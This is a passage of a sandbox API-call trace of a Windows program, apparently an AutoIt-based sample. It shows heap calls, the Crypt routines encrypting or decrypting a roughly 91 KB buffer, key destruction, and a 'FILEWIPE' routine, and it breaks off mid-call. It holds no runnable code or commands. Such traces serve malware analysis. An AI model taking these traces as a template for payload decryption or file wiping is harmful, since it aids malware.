RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0043.671] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0043.672] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0043.672] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.672] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.672] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c820 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.673] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0043.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0043.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0043.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0043.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.673] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.673] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.674] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.674] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0043.675] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0043.675] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0043.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0043.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0043.676] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0043.676] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.676] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da368, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da368*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0043.676] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.676] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.676] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.676] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0043.676] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.676] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.676] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0043.677] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.677] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0043.677] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.677] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.677] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.677] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0043.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0043.677] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.677] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0043.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.678] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1667d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x16680) returned 1 [0043.678] CharLowerBuffW (in: lpsz="byte[91777]", cchLength=0xb | out: lpsz="byte[91777]") returned 0xb [0043.680] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.680] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.682] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.682] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x961d18*, pdwDataLen=0x6ae220*=0x1667d, dwBufLen=0x16680 | out: pbData=0x961d18*, pdwDataLen=0x6ae220*=0x16680) returned 1 [0043.685] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0043.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.685] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0043.686] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0043.699] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0043.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.699] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.699] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.699] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0043.699] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0043.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.699] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.699] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0043.700] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.700] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.700] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.700] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0043.700] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0043.700] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0043.700] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.700] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0043.700] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.700] FreeLibrary (hLibModule=0x754b0000) returned 1 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0043.700] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0043.702] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0043.702] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0043.702] HeapFree (in: hHeap=0x770000, 